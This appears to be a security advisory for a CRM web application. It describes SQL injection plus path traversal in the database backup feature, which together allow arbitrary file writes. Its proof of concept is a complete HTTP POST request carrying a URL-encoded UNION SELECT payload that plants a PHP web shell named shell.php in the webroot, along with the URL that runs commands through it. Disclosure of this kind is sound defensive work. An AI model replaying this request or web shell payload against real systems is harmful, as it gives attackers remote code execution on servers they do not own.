Description

This vulnerability allows the attacker to leverage a SQL injection attack in the database backup functionality to write arbitrary data to an arbitrary file on disk anywhere where the user can write. This includes the webroot in a default installation allowing the attack to place a web shell in a location they can reach from the server.

Proof of Concept

This vulnerability requires an active session of an account. The cookies and the csrf token need to be replaced in the http request below. This will place a file called shell.php into the webroot where the attacker can access it via http://localhost:8081/shell.php?c=id to execute the id command.

POST /xhr/?module=settings&page=generateDatabaseBackup HTTP/1.1
Host: localhost:8081
sec-ch-ua: "Not A(Brand";v="24", "Chromium";v="110"
X-CSRF-TOKEN: 4a07ceabd1734243fbd0a9cf714b65452551f0e6
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
sec-ch-ua-platform: "Windows"
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8081/home/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: CRM-40d1b2d83998fabacb726e5bc3d22129=12j4f7uk8bi3o77pun4dd7e3hd; __f8b4221bcc40754ca24ed6adc27973c785a8e4cd=db3fd51122bad08f449fc62eee05da13; eid=1
Connection: close
Content-Length: 180

backupFormat=%2f..%2f..%2f..%2fshell.php&backupName=a&selectedTable[0]=time_dimension%20where%201%3d2%20union%20all%20select%20'%3c%3fphp%20echo%20%60%24_GET%5bc%5d%60%3b%20%3f%3e'

Impact

Remote code execution